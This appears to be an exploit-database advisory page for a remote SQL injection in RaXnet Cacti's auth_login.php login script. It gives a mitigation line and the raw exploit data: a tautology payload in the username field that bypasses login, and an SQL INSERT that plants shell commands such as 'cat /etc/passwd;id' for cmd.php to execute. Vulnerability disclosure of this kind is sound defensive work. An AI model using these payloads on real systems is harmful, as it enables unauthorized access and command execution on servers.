RaXnet Cacti Remote SQL Injection Vulnerability

vendor:

Cacti

by:

Unknown

7.5

CVSS

HIGH

Remote SQL Injection

Unknown

CWE

Product Name: Cacti

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: Unknown

Related CWE: Unknown

CPE: Unknown

Metasploit:

Other Scripts:

Platforms Tested: Unknown

Unknown

RaXnet Cacti Remote SQL Injection Vulnerability

The vulnerability exists in the auth_login.php script of RaXnet Cacti due to improper sanitization of user-supplied input. An attacker can exploit this vulnerability by injecting malicious SQL code into the 'username' parameter, allowing them to bypass the authentication interface and execute arbitrary commands on the affected system.

Mitigation:

It is recommended to apply the latest patches and updates from the vendor. Additionally, input validation and sanitization should be implemented to prevent SQL injection attacks.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10960/info

RaXnet Cacti is reportedly affected by a remote SQL injection vulnerability. This issue occurs in the auth_login.php script due to a failure of the application to properly sanitize user-supplied "username" URI parameter input before using it in an SQL query.

It is demonstrated that an attacker may exploit this vulnerability in order to bypass the authentication interface used by Cacti.

username = admin' or '6'='6
password = password wished

insert into data_input_data_cache (local_data_id, host_id,
data_input_id, action, command, hostname, snmp_community,
snmp_version, snmp_username, snmp_password, snmp_port, snmp_timeout,
rrd_name, rrd_path, rrd_num, arg1, arg2, arg3)
values ('9', '1', '7', '1', 'cat /etc/passwd;id;somecommand; some
script', '127.0.0.1', '', '1', '', '', '161', '500',
'hack', '/', '3', 'NULL', 'NULL', 'NULL');

Then points to http://www.example.com/cacti/cmd.php and the command will be
executed.